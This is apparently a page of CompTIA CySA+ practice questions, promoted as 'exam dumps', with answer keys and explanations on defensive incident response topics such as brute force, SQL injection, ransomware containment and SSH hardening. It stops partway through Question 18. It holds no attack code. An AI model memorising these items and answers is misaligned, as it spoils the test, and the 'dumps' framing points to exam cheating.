Visit here for our full CompTIA CS0-003 exam dumps and practice test questions.
Question 1
A security analyst is monitoring network traffic and notices multiple failed login attempts originating from the same IP address over a short period. The analyst suspects this is a brute force attack. Which of the following steps should the analyst take FIRST to mitigate the risk?
A) Block the offending IP address and update firewall rules
B) Reset all user passwords across the organization
C) Deploy antivirus on all endpoints immediately
D) Conduct a full vulnerability assessment of the network
Answer: A
Explanation:
When a security analyst identifies multiple failed login attempts from the same IP address within a short timeframe, it strongly indicates a brute force attack, which is an attempt by an attacker to guess credentials by systematically trying combinations. The primary concern in such cases is to stop the attack before it compromises sensitive accounts. The most immediate and effective action is to block the offending IP address using firewall rules or network access controls. This prevents further attempts from the same source, minimizing the risk of a successful intrusion while maintaining network stability.
B resetting all user passwords is a reactive measure and can be disruptive to users; while it may eventually prevent compromised accounts from being exploited, it does not immediately stop ongoing attack attempts. C deploying antivirus on endpoints is essential for malware defense, but brute force attacks targeting login credentials are typically unrelated to endpoint malware. Antivirus installation will not mitigate immediate unauthorized login attempts. D conducting a full vulnerability assessment is a strategic action for identifying weaknesses in the network but is not an immediate mitigation against ongoing brute force attempts.
In a CompTIA CySA+ context, identifying and mitigating active threats is a core skill. Analysts must prioritize incident response actions based on immediacy and impact. Brute force attacks exploit weak passwords, predictable usernames, and poorly configured authentication systems. Effective defensive strategies include implementing account lockout policies, enforcing multifactor authentication (MFA), and monitoring logs for anomalous login activity. Analysts should also understand how to correlate SIEM alerts, log data, and network flow analysis to detect patterns indicating credential-based attacks. By immediately blocking malicious IPs, analysts reduce the attack surface while planning subsequent steps like password resets, security awareness training, and policy enforcement. This approach ensures a balance between proactive threat mitigation and minimal operational disruption, which is essential for security operations center (SOC) efficiency and for passing the CySA+ exam scenarios.
Question 2
A cybersecurity analyst is reviewing alerts from the SIEM and notices repeated SQL injection attempts on a web application. Which of the following is the BEST mitigation strategy to prevent these attacks from succeeding?
A) Apply web application firewall (WAF) rules to filter malicious input
B) Update endpoint antivirus signatures
C) Disable unused network ports on the server
D) Increase password complexity requirements for all users
Answer: A
Explanation:
SQL injection attacks exploit vulnerabilities in web applications by injecting malicious SQL queries through input fields. When a SIEM alerts the analyst to repeated SQL injection attempts, the most effective mitigation is the deployment of a web application firewall (WAF) configured with rules to sanitize and filter malicious input. WAFs inspect HTTP/HTTPS traffic and can block requests containing suspicious characters, keywords, or patterns indicative of SQL injection. This reduces the likelihood of attackers compromising the database while maintaining legitimate traffic flow.
B updating endpoint antivirus signatures is essential for malware prevention but is not directly related to preventing SQL injection attacks, which target application logic rather than local malware infection. C disabling unused network ports enhances network security but does not mitigate web application input vulnerabilities exploited by SQL injection. D increasing password complexity strengthens authentication but does not address the injection vector used to manipulate databases.
In the CompTIA CySA+ exam framework, analysts are expected to identify the threat vector, analyze logs, and implement precise mitigation strategies. SQL injection mitigation extends beyond WAFs; it includes parameterized queries, input validation, and secure coding practices. Analysts should also conduct regular vulnerability scanning, patch management, and penetration testing to identify and remediate potential injection points. Correlating SIEM alerts with web server logs and database logs allows analysts to verify the attack source and understand the frequency, providing a foundation for long-term security enhancements. This scenario reinforces critical CySA+ skills in application security monitoring, threat detection, and risk-based mitigation planning, emphasizing the importance of layered defenses against application-level attacks.
Question 3
During a threat hunting exercise, an analyst identifies unusual outbound traffic to an unfamiliar external IP address on port 443 from a workstation. Which of the following actions should the analyst perform NEXT to determine if this activity is malicious?
A) Conduct a reputation check on the external IP and examine the process generating traffic
B) Immediately block all outbound traffic from port 443
C) Reimage the affected workstation without further investigation
D) Disable user accounts associated with the workstation
Answer: A
Explanation:
Unusual outbound traffic on port 443, commonly used for HTTPS, can indicate malware communication, data exfiltration, or unauthorized remote access. The next logical step is to conduct a reputation check on the external IP using threat intelligence sources to determine if it is known for malicious activity. Simultaneously, the analyst should identify the process or application generating the traffic to understand if it is legitimate software or a suspicious executable. This approach aligns with CySA+ principles of evidence-based threat analysis and prevents premature mitigation steps that could disrupt operations unnecessarily.
B immediately blocking all outbound port 443 traffic could halt critical web services, creating unnecessary business disruption. C reimaging the workstation without analysis disregards the importance of collecting forensic evidence for root cause analysis and incident response documentation. D disabling user accounts may interrupt workflow and may not address the underlying malware or compromised system.
CompTIA CySA+ emphasizes threat hunting, incident analysis, and evidence collection. Analysts should leverage tools such as network flow analysis, endpoint detection and response (EDR) systems, and threat intelligence platforms to correlate unusual activity with known attack patterns. Understanding the normal baseline of outbound traffic, application behavior, and workstation usage allows analysts to distinguish benign anomalies from malicious activity. Once the threat is verified, containment, eradication, and recovery steps can be planned. Effective threat analysis integrates network monitoring, endpoint visibility, and actionable intelligence, reinforcing the need for structured investigation before applying mitigation measures that could affect operational continuity. This method ensures a risk-informed response, which is central to the CySA+ objectives.
Question 4
A security analyst receives an alert that multiple endpoints are reporting unexpected registry changes and attempts to connect to an unfamiliar command-and-control server. Which of the following best describes the type of threat being observed?
A) Advanced persistent threat (APT)
B) Phishing attack
C) Insider threat
D) Denial-of-service attack
Answer: A
Explanation:
Unexpected registry modifications on multiple endpoints, combined with attempts to communicate with unknown command-and-control (C2) servers, are hallmarks of an advanced persistent threat (APT). APTs involve sophisticated, targeted attackers who establish long-term access to a network for espionage or data exfiltration. They often leverage custom malware, lateral movement, and stealthy persistence mechanisms, such as registry changes, scheduled tasks, or hidden services, to maintain footholds without detection. The communication with external C2 servers allows attackers to issue commands, update malware, or exfiltrate sensitive information while bypassing traditional security controls.
B phishing attacks primarily rely on social engineering to trick users into revealing credentials or installing malware and do not inherently involve widespread registry modifications or persistent C2 connections. C insider threats involve legitimate users abusing access, often without external C2 communication, and are usually limited to internal data exfiltration or sabotage. D denial-of-service attacks aim to disrupt service availability and do not typically modify registry keys or establish stealthy communication channels.
CySA+ certification requires analysts to differentiate between attack types, understand TTPs (tactics, techniques, and procedures), and identify indicators of compromise (IOCs). Analysts must monitor endpoint behavior, network communication patterns, and persistent malware artifacts to detect APT activity effectively. Indicators include registry anomalies, unexpected process execution, unusual outbound traffic, and lateral movement. Once identified, the analyst should initiate containment procedures, such as isolating affected systems, performing forensic analysis, and eradicating malware while preserving logs for post-incident review. Understanding APTs also involves correlating multiple alerts and leveraging behavioral analytics, EDR tools, and threat intelligence to trace the attacker’s methods and anticipate subsequent actions. Recognizing the characteristics of APTs is fundamental for effective threat detection and response.
Question 5
A company is concerned about potential insider threats. The cybersecurity team wants to detect abnormal user activity patterns, such as accessing sensitive files at unusual hours. Which of the following tools or approaches would BEST support this objective?
A) User and entity behavior analytics (UEBA)
B) Traditional antivirus scanning
C) Network packet sniffing only
D) Enforcing multi-factor authentication
Answer: A
Explanation:
Detecting insider threats often requires monitoring behavioral anomalies rather than simply known malware signatures. User and entity behavior analytics (UEBA) is a security analytics approach that leverages machine learning, statistical models, and baseline activity profiling to detect unusual user or system activity. By establishing normal behavioral patterns, UEBA can flag deviations such as accessing sensitive data at abnormal hours, downloading large amounts of data, or attempting unauthorized administrative actions. This proactive approach allows organizations to identify potential insider threats before they escalate into data breaches or sabotage.
B traditional antivirus scanning detects malware on endpoints but does not analyze patterns of legitimate user activity or behavioral deviations indicative of insider threats. C network packet sniffing provides raw traffic analysis but requires additional correlation and context to identify abnormal behavior patterns. D enforcing multi-factor authentication enhances access security but does not actively detect suspicious activity after access is granted.
CySA+ emphasizes the importance of behavior-based threat detection, anomaly identification, and proactive monitoring. UEBA solutions integrate with SIEM platforms to correlate login times, file access events, privileged account usage, and other logs to detect high-risk behavior. Analysts can configure alert thresholds, prioritize alerts based on risk scoring, and perform investigative follow-ups to determine whether the activity is malicious, accidental, or benign. Insider threats are particularly challenging because they originate from authorized users, making traditional perimeter defenses insufficient. By leveraging UEBA, analysts gain visibility into contextual behavioral patterns, allowing for early detection and mitigation while balancing operational efficiency and privacy considerations. This knowledge aligns directly with CySA+ objectives in behavioral analytics and insider threat mitigation strategies.
Question 6
A cybersecurity analyst observes a sudden spike in outbound network traffic from several workstations to external IP addresses in a foreign country. This activity is atypical for the organization. Which of the following actions should the analyst take FIRST to investigate this behavior?
A) Conduct an endpoint analysis to identify suspicious processes
B) Immediately block all outbound traffic globally
C) Revoke all VPN access for remote employees
D) Update antivirus definitions across all endpoints
Answer: A
Explanation:
When an analyst detects an unusual surge in outbound traffic directed toward external IP addresses—especially in foreign regions not normally accessed by the organization—it signals a potential data exfiltration attempt or malware command-and-control (C2) communication. The first and most effective step is to conduct an endpoint analysis, focusing on identifying the processes responsible for generating the traffic. This involves using endpoint detection and response (EDR) tools, task monitoring, and process inspection to determine if legitimate applications are causing the traffic or if malicious executables are operating in the background.
B immediately blocking all outbound traffic could cause severe operational disruption, especially for critical business functions requiring internet access. C revoking VPN access might prevent external access but does not address the ongoing exfiltration from compromised workstations. D updating antivirus definitions is good for overall security hygiene but is not a direct investigative action and may not detect advanced threats that bypass signature-based solutions.
In the context of CompTIA CySA+, analysts are expected to apply structured investigative procedures: identifying anomalies, collecting relevant evidence, and understanding the scope and source of threats. Key techniques include network flow analysis, packet inspection, endpoint log review, and correlation of SIEM alerts. Analysts should also review historical network baselines to understand deviations from normal behavior. Identifying the offending process helps determine whether the activity is part of a malware infection, insider threat, or misconfigured application. Proper documentation and chain-of-custody procedures are also vital if the investigation escalates to a formal incident response. By focusing first on endpoint analysis, the analyst ensures that remediation efforts are targeted, evidence-driven, and minimally disruptive, which is aligned with the strategic objectives tested on the CySA+ exam.
Question 7
An organization is deploying a new cloud-based application that handles sensitive customer data. The security team wants to ensure proper access control and auditing of all activity within the application. Which of the following is the MOST effective approach?
A) Implement role-based access control (RBAC) and enable detailed logging
B) Require employees to change passwords every 30 days
C) Deploy endpoint antivirus on all devices
D) Disable multi-factor authentication to simplify access
Answer: A
Explanation:
Cloud-based applications that manage sensitive data require a comprehensive access control and auditing strategy to prevent unauthorized access and facilitate accountability. The most effective approach is to implement role-based access control (RBAC), which assigns permissions based on job roles and responsibilities, ensuring users have the minimum privileges necessary to perform their duties. In parallel, detailed logging and auditing should be enabled to track every action, including login attempts, file access, and administrative changes. This dual approach enforces security while providing visibility for compliance and forensic investigations.
B requiring frequent password changes can improve security marginally but does not provide granular access control or logging for auditing purposes. C deploying antivirus protects endpoints from malware but does not address access management or auditing within the application itself. D disabling multi-factor authentication reduces security and exposes the organization to credential-based attacks, making it counterproductive.
In the CompTIA CySA+ framework, analysts are tasked with evaluating security controls in cloud environments, where identity and access management (IAM), monitoring, and auditing are fundamental. RBAC ensures that users cannot escalate privileges unnecessarily, mitigating insider threats and limiting exposure in case of credential compromise. Logging enables analysts to perform behavioral analytics, anomaly detection, and incident investigation, supporting compliance with standards such as GDPR, HIPAA, or ISO 27001. The integration of RBAC with SIEM platforms allows automated alerts for unusual access patterns, enhancing proactive threat detection. Proper configuration of cloud access controls and auditing mechanisms is therefore a cornerstone of secure cloud operations, highlighting the importance of strategic planning, policy enforcement, and technical implementation, which are all central to CySA+ exam objectives.
Question 8
A security analyst is investigating a malware infection that encrypts user files and displays a ransom note demanding cryptocurrency. Which of the following is the MOST critical action the analyst should take to preserve evidence for further analysis?
A) Isolate affected systems from the network but do not power them down
B) Immediately power down all affected systems to stop encryption
C) Delete the ransom note to prevent confusion
D) Remove the malware using antivirus software before analysis
Answer: A
Explanation:
When dealing with ransomware infections, preserving forensic evidence is crucial for understanding the attack vector, identifying malware behavior, and supporting potential law enforcement investigations. The most critical step is to isolate affected systems from the network to prevent further spread of the malware while avoiding powering them down, which could destroy volatile memory containing valuable forensic information such as encryption keys, active processes, network connections, and malware memory artifacts. Isolation maintains system integrity and allows analysts to conduct a detailed investigation.
B immediately powering down systems risks losing volatile data that may be essential for understanding the malware’s mechanisms and tracing its origin. C deleting the ransom note eliminates evidence that may contain key details such as the attacker’s email, cryptocurrency wallet, or specific identifiers. D removing malware prematurely may destroy forensic artifacts and critical information needed for analysis or recovery.
CompTIA CySA+ emphasizes incident response, malware analysis, and evidence preservation. Analysts should collect system logs, memory dumps, and file system snapshots, documenting every step to maintain chain-of-custody. Using EDR tools and forensic imaging techniques ensures that data remains intact for further reverse engineering or threat intelligence correlation. Understanding ransomware behavior, including encryption methods, persistence mechanisms, and communication with command-and-control servers, is vital for implementing effective containment, eradication, and recovery strategies. Analysts should also correlate network traffic with SIEM logs to identify lateral movement or exfiltration attempts. This approach demonstrates a structured response that prioritizes evidence preservation, operational containment, and future threat mitigation, aligning directly with the CySA+ certification objectives and real-world cybersecurity best practices.
Question 9
A security analyst is analyzing logs and notices repeated alerts indicating attempts to exploit outdated software vulnerabilities on several servers. Which of the following should the analyst recommend to prevent future exploitation?
A) Implement a rigorous patch management program and prioritize high-risk vulnerabilities
B) Increase the strength of user passwords
C) Disable all network services to eliminate attack surfaces
D) Deploy endpoint antivirus on all servers
Answer: A
Explanation:
Repeated exploitation attempts targeting outdated software signify that attackers are scanning for and leveraging unpatched vulnerabilities, which is a common vector for unauthorized access or ransomware deployment. The most effective preventive measure is to implement a structured patch management program, prioritizing vulnerabilities based on severity, potential impact, and likelihood of exploitation. This ensures that critical software updates are applied promptly, reducing the attack surface and preventing repeated exploitation attempts.
B increasing user password strength does not directly mitigate vulnerabilities in server software, as exploitation occurs at the application or service layer rather than the authentication layer. C disabling all network services is impractical and would disrupt business operations while providing minimal targeted mitigation. D deploying antivirus alone cannot prevent exploitation of unpatched software vulnerabilities, particularly for attacks leveraging zero-day or advanced exploits.
For CySA+ certification, analysts are expected to identify patterns of repeated attacks, assess system vulnerabilities, and recommend proactive remediation measures. Patch management is central to risk reduction strategies and complements other cybersecurity controls like intrusion detection systems (IDS), SIEM correlation, and endpoint monitoring. Analysts should also maintain an inventory of assets, regularly scan for vulnerabilities, and prioritize patching based on business criticality. Combining these practices with ongoing monitoring allows for early detection and rapid response, minimizing downtime, protecting sensitive data, and ensuring compliance with regulatory frameworks. Understanding the interplay between threat intelligence, vulnerability management, and incident response is critical for a holistic approach to enterprise cybersecurity, aligning with the objectives tested on the CySA+ exam.
Question 10
During routine monitoring, a security analyst observes that an attacker has gained unauthorized access to an internal system and is attempting lateral movement to other hosts. Which of the following steps represents the BEST immediate response?
A) Contain the affected system to prevent further lateral movement
B) Notify all users to log out immediately
C) Perform a full malware scan of the entire network
D) Reboot all servers to terminate active sessions
Answer: A
Explanation:
When an attacker successfully gains access to a system and attempts lateral movement, the immediate priority is to contain the affected system to prevent compromise of additional hosts. Containment involves isolating the compromised host from the network, monitoring its connections, and stopping malicious processes. This action limits the attack’s scope, allowing the security team to analyze the threat, identify affected systems, and plan remediation.
B notifying all users to log out may reduce potential exposure but does not isolate the compromised host directly or prevent the attacker from moving laterally. C performing a full malware scan of the network is reactive and time-consuming; the threat may continue to propagate while the scan is in progress. D rebooting servers may terminate active sessions but can destroy volatile forensic evidence and does not guarantee that the attacker’s foothold or backdoors are removed.
CompTIA CySA+ emphasizes incident response procedures, threat containment, and minimizing organizational impact. Analysts should follow established playbooks for containment, preserve evidence for forensic analysis, and coordinate with IT teams to prevent data loss. Lateral movement is often detected through anomalies in network traffic, unusual authentication patterns, and alerts from endpoint detection systems. Effective containment strategies include network segmentation, firewall rules, endpoint isolation, and monitoring communication channels for suspicious activity. Analysts must also plan follow-up remediation steps such as patching vulnerabilities, removing malware, resetting credentials, and strengthening detection capabilities to prevent recurrence. Proper execution of these measures ensures that incident response is methodical, evidence-based, and aligned with enterprise cybersecurity objectives, directly reflecting the competencies tested on the CySA+ exam.
Question 11
A security analyst is reviewing endpoint telemetry from an EDR platform and notices multiple devices generating alerts related to suspicious PowerShell commands that appear to be obfuscated. The commands are contacting unknown remote servers and attempting to download additional payloads. Which of the following should the analyst do FIRST to mitigate the threat?
A) Isolate the affected endpoints from the network
B) Reset all user account passwords
C) Disable PowerShell across the entire organization
D) Rebuild every affected workstation immediately
Answer: A
Explanation:
When an analyst begins observing a surge of alerts generated by suspicious PowerShell activity—particularly obfuscated commands communicating with external servers—this indicates a strong likelihood of fileless malware, remote command execution attempts, or active exploitation. The first immediate action should always be containment, which is achieved by isolating the affected endpoints. This prevents further communication with command-and-control hosts, halts propagation through the network, and preserves volatile evidence essential for forensic examination.
A isolation is the correct choice because it adheres to the core principles of incident response: containment before eradication. EDR platforms typically offer isolation features that sever external communication while allowing forensic and administrative access for analysts. This prevents malicious payloads from being downloaded or executed while enabling the security team to perform targeted investigation.
B resetting passwords is a recommended later step but not the first. Although credential theft may have occurred (especially with PowerShell-based attacks such as Pass-the-Hash or credential scraping), password resets alone do not stop ongoing malicious communication or code execution.
C disabling PowerShell enterprise-wide is overly broad and disruptive. Many organizations rely on PowerShell for automation, configuration management, and secure remoting. Disabling it without proper analysis can hinder IT operations and may not stop the underlying compromise.
D rebuilding workstations is an extreme remediation step. While reimaging may eventually be necessary for systems deeply affected by fileless malware, it should not be done before containment and forensic review. Premature rebuilding erases valuable memory-resident artifacts such as encoded commands, malicious scripts, credentials in memory, and active network connections.
From a CySA+ perspective, analysts must thoroughly understand the behavior and indicators associated with PowerShell exploitation. Attackers frequently use living-off-the-land binaries (LOLBins), including PowerShell, to bypass traditional defenses. Obfuscation—such as Base64 encoding, string concatenation, or character substitution—makes the malicious command harder to detect but not impossible to analyze. EDR tools reveal process lineage, command-line arguments, script block logs, and network destinations, giving analysts visibility into the attack chain.
Key steps after isolation include capturing memory dumps, exporting process trees, analyzing script block logs, reviewing network flows to external IP addresses, and checking for persistence mechanisms such as scheduled tasks or registry modifications.
The overarching goal is to stop the execution, understand the root cause, remove any artifacts, and prevent future incidents. Containment ensures that investigation can proceed safely and methodically, aligning perfectly with CySA+ incident response frameworks.
Question 12
A cybersecurity team discovers that a threat actor gained access to the organization’s email accounts through credential stuffing attacks. Logs show thousands of successful logins originating from automated scripts. Which security enhancement would MOST effectively prevent this type of attack in the future?
A) Enforce multi-factor authentication for all user accounts
B) Implement password expiration policies
C) Configure full-disk encryption on email servers
D) Block all foreign IP ranges completely
Answer: A
Explanation:
Credential stuffing attacks rely on the reuse of usernames and passwords that originate from previously leaked or breached databases. Attackers automate login attempts across multiple platforms using massive credential lists. Once a reused password is found, authentication succeeds without any exploit. In this scenario, numerous successful logins were achieved by automated scripts, meaning the attacker leveraged exposed credentials.
A enabling multi-factor authentication (MFA) is the most effective mitigation because MFA requires at least one additional authentication factor besides passwords. Even if attackers possess valid credentials, MFA prevents unauthorized access by requiring something the attacker does not have—such as a hardware token, one-time code, or mobile push notification. It directly counters credential stuffing because authentication cannot proceed without completing the second challenge.
B password expiration policies may encourage users to rotate passwords periodically, but they do not prevent credential stuffing attacks because users often create predictable variations or reuse passwords across services. Modern cybersecurity guidelines discourage frequent forced changes because they lead to weaker password hygiene.
C enabling full-disk encryption protects data at rest but has no relevance to authentication attacks. Encryption secures stored data, not login attempts coming through email access portals or cloud platforms.
D blocking foreign IP ranges can reduce some malicious traffic but is not an effective primary defense. Many threat actors use VPNs, compromised domestic servers, or cloud-based proxies, making geolocation filtering unreliable. It may also inadvertently block legitimate users traveling abroad.
CySA+ candidates must understand attack patterns, authentication controls, and mitigation strategies. Credential stuffing belongs to the category of password-based attacks. It is often accompanied by bot-driven request spikes, anomalous login times, and geographically dispersed authentication attempts. Analysts must correlate identity management logs, cloud IAM data, and SIEM alerts to identify abnormal authentication events.
After an incident, security teams should advise password resets for compromised accounts, enable login attempt throttling, enforce strong password policies, and use anomaly-based detection such as impossible travel logic. Implementing MFA, however, remains the most powerful and widely recommended countermeasure. MFA ensures that compromised credentials alone cannot grant access, thus highly reducing the success rate of automated credential attacks. This strategic enhancement is fundamental for enterprise security architecture and is repeatedly highlighted across CySA+ exam objectives.
Question 13
While reviewing web server logs, an analyst identifies repeated SQL injection attempts targeting a legacy application. The queries include unusual characters, concatenated strings, and attempts to bypass authentication mechanisms. Which action should the analyst recommend FIRST?
A) Implement web application firewall rules to block malicious queries
B) Rewrite the entire application in a new programming language
C) Block all HTTP traffic until developers fix the code
D) Disable database backups temporarily
Answer: A
Explanation:
SQL injection is one of the most dangerous and widespread web application vulnerabilities. When an analyst notices hostile SQL queries in server logs—such as union-based attempts, Boolean injections, time-based delays, or authentication bypass payloads—it indicates automated scanners or active attackers probing for weaknesses.
A implementing web application firewall (WAF) rules is the correct first step because a WAF can detect and block malicious queries immediately. This provides crucial short-term protection while developers work on long-term fixes. Modern WAFs analyze query patterns, identify suspicious payloads, and enforce filtering policies to prevent unsafe inputs from reaching the application. This approach minimizes business disruption and enhances defense-in-depth.
B rewriting the entire application is unrealistic and unnecessary as an immediate action. While legacy applications may indeed require modernization, rewriting the entire platform is a months-long initiative and cannot be performed during an active attack.
C blocking all HTTP traffic would shut down the service completely, causing severe business impact and violating availability requirements. This is too drastic, especially when defense mechanisms like WAFs can block malicious requests selectively.
D disabling database backups is dangerous and counterproductive; backups are crucial for recovery in the event of data corruption or exploitation. They must remain intact and accessible.
CySA+ candidates must understand how to rapidly mitigate web-based attacks, while recognizing that remediation must follow a structured approach. SQL injection originates from unvalidated input fields, such as login forms or search bars. Attackers exploit these weaknesses to retrieve data, modify tables, escalate privileges, or manipulate database logic. Analysts reviewing log data often observe patterns such as suspicious symbols, encoded payloads, or verbose error messages.
Recommended steps include applying WAF filters, enabling input validation, sanitizing queries through parameterized statements, and performing regular vulnerability scans. Long-term remediation should involve reviewing application code, updating outdated libraries, and conducting penetration testing to ensure compliance with secure coding standards. Mitigation frameworks such as OWASP guidelines are particularly relevant for exam preparation and real-world implementation.
Question 14
A threat intelligence team observes that a newly discovered malware variant is using domain-generated algorithms (DGAs) to evade detection and frequently change its command-and-control hosts. What is the MOST effective way to defend against this type of threat?
A) Deploy DNS filtering with machine learning–based anomaly detection
B) Disable all outbound DNS queries from the network
C) Create static firewall rules to block each domain manually
D) Block all encrypted traffic across the organization
Answer: A
Explanation:
Malware that uses domain-generated algorithms (DGAs) is particularly difficult to track and block. DGAs rapidly produce large numbers of pseudo-random domain names that serve as potential command-and-control servers. Because these domains change frequently, traditional blacklist-based filtering becomes ineffective.
A DNS filtering enhanced with anomaly detection is the most effective defense because it relies on behavioral patterns rather than static domain lists. Machine learning techniques can evaluate characteristics of domain queries—such as entropy, length patterns, randomness, and frequency—and identify DGA-based traffic with high accuracy. This allows security teams to detect and block connections to suspicious domains before malware successfully establishes communication.
B disabling all outbound DNS queries is impractical, as it would completely break internet functionality for the organization. DNS is fundamental for navigation and communication, so this is not a viable strategy.
C creating static firewall rules for each malicious domain is ineffective because DGAs generate thousands of constantly changing hostnames. Maintaining such a list manually is impractical and insufficient.
D blocking all encrypted traffic is dangerous and unrealistic. Legitimate services rely on encryption for secure communication. Blocking all encrypted traffic would devastate business operations and violate cybersecurity best practices.
CySA+ candidates must understand the evolution of malware evasion techniques, including DGAs, fast-flux DNS, and encrypted C2 channels. DGA detection requires analyzing DNS patterns, integrating SIEM correlation, and using threat-intelligence feeds that provide insights on suspicious domain activity. DNS-layer security solutions help organizations identify malicious behavior long before payloads execute or data exfiltration occurs.
The analyst should also review internal logs, investigate infected endpoints, and quarantine compromised systems. Network segmentation and strict egress filtering further reduce the impact of DGA-enabled malware. By implementing intelligent DNS controls, organizations strengthen their ability to counter modern threats that rely on rapid domain rotation to circumvent traditional defenses.
Question 15
A security operations team detects anomalous SMB traffic between multiple internal hosts, including file transfers occurring outside business hours. Further investigation reveals signs of brute-force attempts and lateral movement. Which of the following should the analyst prioritize to stop the spread of the attack?
A) Disable compromised accounts and initiate network segmentation**
B) Perform system-wide firmware updates immediately
C) Shut down the file server permanently
D) Reinstall the operating systems on all hosts
Answer: A
Explanation:
Anomalous SMB traffic involving unexpected file transfers outside normal operational hours is a strong indicator of lateral movement. When brute-force attempts accompany this activity, the threat is likely exploiting weak credentials or stolen hashes to move deeper into the network. The top priority must be preventing additional systems from being compromised.
A disabling affected accounts and implementing network segmentation is the correct response because it directly stops lateral movement. Disabling accounts used by the attacker cuts off access, while segmentation limits the propagation path by isolating hosts and restricting inter-host communication. This approach aligns with incident response best practices by containing the threat before performing more resource-intensive remediation.
B firmware updates are irrelevant at this stage. While updating firmware is a good long-term security measure, it does not address ongoing lateral movement or brute-force authentication attempts.
C shutting down the file server permanently is unnecessary, harmful, and disruptive. The server may be a target, but immediate shutdown without analysis could lead to data loss and operational downtime.
D reinstalling operating systems on all hosts is a drastic step appropriate only after containment and full forensic evaluation. This should never be the first priority because evidence would be destroyed prematurely.
CySA+ professionals must be skilled in detecting lateral movement techniques such as credential reuse, SMB exploitation, remote execution, and privilege escalation. Logs revealing unusual SMB file transfers, authentication spikes, or inter-host communication patterns are key indicators. Analysts should identify compromised accounts through SIEM correlation, EDR telemetry, Kerberos anomalies, and brute-force alerting tools.
Once isolation and account disabling occur, further steps include checking password policies, enforcing MFA, scanning for persistence mechanisms, and reviewing administrative privileges. Network segmentation enhances security by dividing the network into zones and reducing the blast radius of attacks. Combining segmentation with enhanced identity management, endpoint containment, and log analysis forms a holistic mitigation strategy aligned with CySA+ methodologies and incident response frameworks.
Question 16
During an investigation, a cybersecurity analyst identifies that several internal systems are communicating with an external IP using uncommon ports and generating encrypted traffic that is not associated with any approved business application. The analyst suspects that an attacker has installed a covert tunneling tool. What should the analyst do FIRST to validate this suspicion?
A) Review packet captures to analyze traffic behavior and patterns
B) Immediately block all communication to the external IP
C) Reset user credentials for all employees
D) Disable encryption protocols across the enterprise
Answer: A
Explanation:
When unusual outbound communication occurs on nonstandard ports combined with encrypted traffic, it often indicates the presence of covert tunneling tools, such as reverse shells, data exfiltration utilities, or encrypted command-and-control channels. These types of attack strategies are widely used in modern intrusion campaigns to evade traditional detection mechanisms by hiding malicious activity within encrypted streams. The first and most critical step is to review packet captures through deep packet inspection.
A analyzing packet captures is the correct initial action because it enables the analyst to examine metadata, communication patterns, timing intervals, payload sizes, protocol anomalies, and domain or IP behavior. While the traffic itself may be encrypted, the metadata still provides substantial clues, such as beaconing behavior, abnormal keep-alive intervals, TLS handshake irregularities, and suspicious certificate attributes. Packet captures also expose whether tunneling frameworks such as SSH tunnels, DNS tunnels, or custom TCP wrappers are being leveraged.
B blocking communication to the external IP may be necessary later, but prematurely doing so can impede the investigation and alert the attacker. It also prevents analysts from fully observing the adversary’s behavior, which is crucial for understanding the extent of compromise.
C resetting user credentials is a standard remediation step for identity-related compromise but does not directly validate the presence of covert tunneling. Without confirming the root cause, resetting passwords prematurely may only slightly impact the attacker if persistence mechanisms or unauthorized services remain active.
D disabling encryption protocols is highly destructive and would shut down legitimate secure communications across the entire organization. This action would cause severe operational chaos and violate best practices.
CySA+ candidates must deeply understand advanced attacker tactics involving covert channels. These methods often exploit unused ports, protocol similarity, or legitimate encryption to hide data exfiltration activity. Analysts should evaluate NetFlow data, check for mismatched ports, identify unusual connection durations, review host process trees, and investigate anomalies in TLS certificate fingerprints.
Packet captures are essential for confirming tunneling behavior because they expose structural inconsistencies such as payload size uniformity, malformed packets, repeated beacon intervals, or encrypted sessions originating from unexpected services. After validation, analysts can escalate to containment, isolation of endpoints, blocking command-and-control channels, and digging deeper into system artifacts to uncover persistence mechanisms. A systematic, evidence-driven approach ensures accuracy and aligns with CySA+ incident response frameworks.
Question 17
A company experiences repeated brute-force attempts targeting its public-facing SSH server. Authentication logs show thousands of login failures from distributed IP addresses originating from multiple countries. Which of the following actions would MOST effectively reduce these attacks while maintaining secure remote access for administrators?
A) Enforce key-based SSH authentication and disable password logins
B) Block all international IP addresses permanently
C) Reassign the SSH port to a random high-numbered port
D) Disable SSH access entirely and rely on physical access only
Answer: A
Explanation:
SSH brute-force attacks are extremely common due to automated botnets scanning the internet for exposed SSH services. These attacks rely on password guessing using massive dictionaries and credential reuse. The most effective mitigation is to remove passwords from the authentication process and enforce key-based authentication.
A enforcing key-based SSH authentication and disabling password authentication is the strongest defense because SSH keys are cryptographically secure and significantly more resistant to brute-force attempts. Private keys cannot be guessed through conventional dictionary attacks due to the enormous complexity of the key space. This approach also aligns with best practices in server hardening and remote administration.
B blocking all international IPs is not effective because threat actors frequently use proxies, VPNs, and compromised domestic systems to conduct brute-force attacks. Geolocation filtering may reduce some noise but is insufficient as a standalone security measure.
C changing the SSH port provides only minimal security. While it may reduce low-effort automated scans, determined attackers use full-range port scanning and will still identify the exposed service. This is considered security by obscurity and does not fundamentally solve the issue.
D disabling SSH entirely is impractical, especially for organizations that require remote system administration. For many companies, SSH is essential for server management, automation, and DevOps workflows.
CySA+ candidates must understand identity-focused attacks, including brute-force attempts and credential stuffing. They should also be familiar with mitigation techniques such as fail2ban, rate limiting, MFA for SSH, firewall rules, VPN tunnels, bastion hosts, and hardened key-based authentication. SSH logs often display repeated authentication failures, password-guessing tools, timing patterns, and unusual geographic sources.
Key-based authentication represents a robust, scalable, and secure method that significantly mitigates brute-force risks while maintaining operational efficiency. Its adoption is widely recommended across cybersecurity frameworks, and it reflects the core defensive principles evaluated on the CySA+ exam.
Question 18
A security analyst discovers that multiple endpoints are infected with malware delivered through a phishing email containing a malicious macro embedded in a document. The malware establishes persistence through registry modifications and scheduled tasks. What should the analyst prioritize FIRST during remediation?
A) Contain infected hosts to prevent additional spread
B) Delete the phishing email from all employee inboxes
C) Disable all scheduled tasks across the network
D) Perform company-wide security awareness training immediately
Answer: A
Explanation:
Phishing emails delivering macro-based malware are a widespread attack vector, and infections that leverage registry changes and scheduled tasks indicate persistence mechanisms designed to ensure continuous execution. The highest priority in any incident involving active malware is containment.
A containing infected hosts is the correct initial step because it prevents the malware from spreading to additional systems, communicating with command-and-control servers, or exfiltrating more data. Containment typically includes isolating hosts via network controls, restricting outbound connections, and identifying impacted systems through endpoint telemetry.
B deleting the phishing email from inboxes is important but not the first priority. Removing the email does not help already infected systems and may hinder forensic analysis if the original source is deleted prematurely.
C disabling scheduled tasks across the entire enterprise is a dangerous overreaction. This would disrupt legitimate scheduled operations such as backups, system patches, automated processes, and monitoring tasks.
